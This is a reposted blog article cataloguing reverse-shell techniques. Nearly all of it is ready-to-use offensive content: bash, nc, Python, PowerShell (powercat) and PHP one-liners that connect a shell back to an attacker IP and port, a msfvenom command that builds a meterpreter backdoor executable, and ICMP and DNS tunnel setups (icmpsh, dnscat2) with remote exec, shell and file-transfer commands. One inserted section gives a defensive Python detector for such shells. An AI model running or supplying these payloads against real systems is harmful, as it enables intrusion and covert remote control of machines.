What are the rebound (reverse) shells?

王林
2023-05-18 22:01:04

1.bash reverse shell

bash -i >& /dev/tcp/ip_address/port 0>&1

2.nc reverse shell

nc -e /bin/sh 192.168.2.130 4444

3.python

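import socket, subprocess, os

# connect back to the listener
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.2.130", 4444))
# point stdin, stdout and stderr at the socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# the interactive shell inherits those descriptors
p = subprocess.call(["/bin/bash", "-i"])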

4.powercat

Import-Module .\powercat.ps1
powercat -c 192.168.2.130 -p 4444 -e cmd.exe

5.msf generates exe backdoor

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.130 LPORT=4444 -f exe > shell.exe

6.php reverse shell

php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
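
From the defender's side, the bash, nc, python and php one-liners above share one observable result: a shell process whose stdin, stdout and stderr are all the same TCP socket. The following Python code is an added example (not part of the original article) that checks for that condition from Linux `/proc` data; the function names, the shell list and the sample `/proc/net/tcp` row are constructed for illustration, and the address decoding assumes IPv4 on a little-endian host.

```python
import os
import re
import socket
import struct

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}          # assumed list, extend as needed
SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")
# Constructed /proc/net/tcp sample: 192.168.2.135:50000 -> 192.168.2.130:4444, inode 48213
SAMPLE_TCP = """  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 8702A8C0:C350 8202A8C0:115C 01 00000000:00000000 00:00000000 00000000  1000        0 48213 1 0000000000000000 20 4 30 10 -1
"""

def tcp_peers(proc_net_tcp):
    """Map socket inode -> remote 'ip:port' from /proc/net/tcp text (IPv4, little-endian host)."""
    peers = {}
    for line in proc_net_tcp.splitlines()[1:]:          # skip the header row
        f = line.split()
        if len(f) < 10:
            continue
        ip_hex, port_hex = f[2].split(":")
        ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
        peers[f[9]] = f"{ip}:{int(port_hex, 16)}"
    return peers

def stdio_socket(fd_targets):
    """Return the inode if fds 0, 1 and 2 all link to the same socket, else None."""
    links = {fd_targets.get(fd) for fd in (0, 1, 2)}
    m = SOCKET_LINK.match(links.pop() or "") if len(links) == 1 else None
    return m.group(1) if m else None

def check(comm, fd_targets, peers):
    """Return the remote peer when a shell's stdio is one TCP socket, else None."""
    return peers.get(stdio_socket(fd_targets)) if comm in SHELLS else None

def scan(proc="/proc"):
    """Walk a live Linux /proc and return [(pid, comm, peer)] for matching shells."""
    with open(f"{proc}/net/tcp") as fh:
        peers = tcp_peers(fh.read())
    hits = []
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            with open(f"{proc}/{pid}/comm") as fh:
                comm = fh.read().strip()
            fds = {fd: os.readlink(f"{proc}/{pid}/fd/{fd}") for fd in (0, 1, 2)}
        except OSError:
            continue                                    # process exited or access denied
        if peer := check(comm, fds, peers):
            hits.append((int(pid), comm, peer))
    return hits
```

Run `scan()` as root so that other users' `/proc/<pid>/fd` entries are readable.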

7.ICMP

Disable ICMP echo replies, otherwise the shell keeps jumping; set the value back to 0 to restore them.

sysctl -w net.ipv4.icmp_echo_ignore_all=1

python icmpsh_m.py <source> <target>
python icmpsh_m.py 192.168.2.137 192.168.2.135

Run on Windows 7:

icmpsh.exe -t 192.168.2.137

8.DNS

Here we use dnscat2, which can be downloaded from:

https://downloads.skullsecurity.org/dnscat2/

It is divided into Windows and Linux versions, each with a server and a client. Compiling it with VS2008 is recommended.

Installation

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2
cd server
sudo gem install bundler
bundle install
sudo ruby ./dnscat2.rb

On Kali:

ruby dnscat2.rb --dns host=0.0.0.0,port=53531
ruby dnscat2.rb --dns server=23.105.193.106,port=533,type=TXT --secret=123456 (secret key)
ruby dnscat2.rb xxx.com

On Windows 7:

./dnscat --dns server=192.168.2.130,port=53531
./dnscat --dns server=192.168.2.130,port=53531 --secret=qwer1234 (secret key)
./dnscat xxx.com

After successful connection

View records

Select connection

Use shell

Return to select shell

Execute command

Other commands

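quit (exit the console)
kill <id> (terminate a channel)
set (set a value, for example security=open)
windows (list all channels)
window -i <id> (connect to a channel)

After connecting to a channel, help likewise shows the commands supported inside it (following a single command with -h also explains that command):

clear (clear the screen)
delay (change the remote session timeout)
exec (run a program on the remote machine)
shell (get a reverse shell)
download/upload (upload and download files between the two ends)
suspend (return to the previous level, same as the Ctrl+Z shortcut)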

DNS tunnel forwarding

listen 127.0.0.1:6666 192.168.2.135:80
Port 6666 on the local machine can then be used to reach port 80.

Statement:
This article is reproduced from yisu.com. If there is any infringement, please contact admin@php.cn to have it deleted.